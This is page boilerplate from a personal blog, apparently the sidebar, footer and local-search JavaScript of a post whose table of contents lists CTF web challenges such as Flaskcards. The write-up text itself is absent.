                    <a href="https://sherlocz.github.io/" title="https://sherlocz.github.io/" rel="noopener" target="_blank">sher10ck</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://timeshu.github.io/" title="https://timeshu.github.io/" rel="noopener" target="_blank">Time</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://ama666.cn/" title="https://ama666.cn/" rel="noopener" target="_blank">ama666</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://jgeek.cn/" title="https://jgeek.cn/" rel="noopener" target="_blank">\0x584A</a>
                  </li>
                
              </ul>
            </div>
          

          
            
          
          

        </div>
      </div>

      
      <!--noindex-->
        <div class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
            
            
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Artisinal-Handcrafted-HTTP-3"><span class="nav-number">1.</span> <span class="nav-text">Artisinal Handcrafted HTTP 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Flaskcards"><span class="nav-number">2.</span> <span class="nav-text">Flaskcards</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Flaskcards-Skeleton-Key"><span class="nav-number">3.</span> <span class="nav-text">Flaskcards Skeleton Key</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Flaskcards-and-Freedom"><span class="nav-number">4.</span> <span class="nav-text">Flaskcards and Freedom</span></a></li></ol></div>
            

          </div>
        </div>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>
  


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ZO1RO</span>

  

  
</div>









        








        
      </div>
    </footer>

    

    

    

    
  </div>

  

<script>
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>


























  
  <script src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>


  


  <script src="/js/utils.js?v=7.1.1"></script>

  <script src="/js/motion.js?v=7.1.1"></script>



  
  


  <script src="/js/schemes/muse.js?v=7.1.1"></script>



  
  <script src="/js/scrollspy.js?v=7.1.1"></script>
<script src="/js/post-details.js?v=7.1.1"></script>



  


  <script src="/js/next-boot.js?v=7.1.1"></script>


  

  

  

  


  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  

  

  

  

  

  

  

  

  

</body>
</html>
